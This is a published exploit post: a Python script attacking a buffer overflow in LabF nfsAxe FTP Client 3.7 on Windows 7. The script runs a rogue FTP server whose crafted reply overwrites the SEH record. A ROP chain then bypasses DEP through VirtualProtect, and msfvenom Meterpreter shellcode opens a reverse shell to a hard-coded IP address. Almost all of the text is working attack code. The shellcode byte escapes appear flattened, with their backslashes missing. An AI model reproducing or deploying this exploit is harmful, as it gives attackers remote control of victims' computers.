LabF nfsAxe FTP Client 3.7 Buffer Overflow
Posted on 09 December 2017
#!/usr/bin/env python # # Exploit Title : LabF nfsAxe 3.7 FTP Client (DEP Bypass) # Date : 12/8/2017 # Exploit Author : wetw0rk # Vendor Homepage : http://www.labf.com/nfsaxe/nfs-server.html # Software link : http://www.labf.com/download/nfsaxe.exe # Version : 3.7 # Tested on : Windows 7 (x86) # Description : Upon connection the victim is sent a specially crafted buffer # overwriting the SEH record, resulting in code execution. # # Greetz: abatchy17, mvrk, and Dillage (Dilly Dilly) # # Trigger the vulnerability by : # Login as -> [check] anonymous -> connect # import struct, socket host = "0.0.0.0" port = 21 # msfvenom LHOST=192.168.0.12 LPORT=34 -p windows/meterpreter/reverse_tcp # -f python -b "x00x0ax10" -v shellcode --smallest shellcode = "" shellcode += "x2bxc9x66xb9x18x01xe8xffxffxffxffxc1" shellcode += "x5ex30x4cx0ex07xe2xfaxfdxeax81x04x05" shellcode += "x06x67x81xecx3bxcbx68x86x5ex3fx9bx43" shellcode += "x1ex98x46x01x9dx65x30x16xadx51x3ax2c" shellcode += "xe1xb3x1cx40x5ex21x08x05xe7xe8x25x28" shellcode += "xedxc9xdex7fx79xa4x62x21xb9x79x08xbe" shellcode += "x7ax26x40xdax72x3axedx6cxb5x66x60x40" shellcode += "x91xc8x0dx5dxa5x7dx01xc2x7exc0x4dx9b" shellcode += "x7fxb0xfcx90x9dx5ex55x92x6exb7x2dxaf" shellcode += "x59x26xa4x66x23x7bx15x85x3axe8x3cx41" shellcode += "x67xb4x0exe2x66x20xe7x35x72x6exa3xfa" shellcode += "x76xf8x75xa5xffx33x5cx5dx21x20x1dx24" shellcode += "x24x2ex7fx61xddxdcxdex0ex94x6cx05xd4" shellcode += "xe2xb8xbex8dx8exe7xe7xe2xa0xccxc0xfd" shellcode += "xdaxe0xbex9ex65x4ex24x0dx9fx9fxa0x88" shellcode += "x66xf7xf4xcdx8fx27xc3xa9x55x7exc6xa7" shellcode += "xc6x6fx18xb1xbexdbxb6xb5xb6x95x31x5f" shellcode += "xeaxebxecxedxfexefx80x91xaax29xcbx1a" shellcode += "x26x38x1dx5exa0xdbx9ax9axa6x56x75xa5" shellcode += "xb3x2cx01x50x16xa3xd4x26x94xd3xa9x31" shellcode += "xb6x2fx55x43xb4x1cx31x8fxe6x8dxecxbf" shellcode += "xbdx83xeex34x26xb0x0fx24x79xc5x9exb5" shellcode += "x9exf7xe8xf9xfaxadx96xfdx96xa7xa4x52" shellcode += "xe7xfcxd1x96x55x6dx08x5fx59x5cx64x0f" shellcode += "xd7xc7x4fxeexc7x12xd7x3cxd0x62xf6xda" def create_rop_chain(): # https://www.corelan.be/index.php/security/corelan-ropdb/ # rop chain generated with mona.py - www.corelan.be rop_gadgets = [ 0x7c37653d, # POP EAX # POP EDI # POP ESI # POP EBX # POP EBP # RETN 0xfffffdff, # Value to negate, will become 0x00000201 (dwSize) 0x7c347f98, # RETN (ROP NOP) [msvcr71.dll] 0x7c3415a2, # JMP [EAX] [msvcr71.dll] 0xffffffff, # 0x7c376402, # skip 4 bytes [msvcr71.dll] 0x7c351e05, # NEG EAX # RETN [msvcr71.dll] 0x7c345255, # INC EBX # FPATAN # RETN [msvcr71.dll] 0x7c352174, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN [msvcr71.dll] 0x7c344f87, # POP EDX # RETN [msvcr71.dll] 0xffffffc0, # Value to negate, will become 0x00000040 0x7c351eb1, # NEG EDX # RETN [msvcr71.dll] 0x7c34d201, # POP ECX # RETN [msvcr71.dll] 0x7c38b001, # &Writable location [msvcr71.dll] 0x7c347f97, # POP EAX # RETN [msvcr71.dll] 0x7c37a151, # ptr to &VirtualProtect() - 0x0EF [IAT msvcr71.dll] 0x7c378c81, # PUSHAD # ADD AL,0EF # RETN [msvcr71.dll] 0x7c345c30, # ptr to 'push esp # ret ' [msvcr71.dll] ] return ''.join(struct.pack('<I', _) for _ in rop_gadgets) rop_chain = create_rop_chain() rop_chain += "x90" * 20 rop_chain += shellcode off2ROP = "B" * 212 # offset to the start of our ROP chain off2nSEH = "A" * (9391- ( # offset the nSEH and adjustments len(off2ROP) + len(rop_chain) # account for shellcode and offset ) ) nSEH = "BBBB" # SEH will be the start of the stack pivot SEH = struct.pack('<L', 0x68034468) # ADD ESP,61C # POP # POP # POP # POP # POP # RETN [WCMDPA10.dll] trigger = "C" * (10000 - ( # fill buffer to trigger vulnerability 9399 # offset + nSEH + SEH ) ) buffer = off2ROP + rop_chain + off2nSEH + nSEH + SEH + trigger payload = "220 %s is current directory " % (buffer) try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.bind((host, port)) sock.listen(20) print("[*] server listening on %s:%d") % (host, port) except: print("[-] failed to bind the server exiting...") exit() while True: conn, addr = sock.accept() print("[*] connection from %s:%d") % (addr[0], addr[1]) print("[+] sending %d bytes to target host" % (len(buffer))) conn.send('220 Welcome Serv-U FTP Server v6.0 for WinSock ready... ') conn.recv(1024) conn.send('331 OK ') conn.recv(1024) conn.send('230 OK ') conn.recv(1024) conn.send(payload)
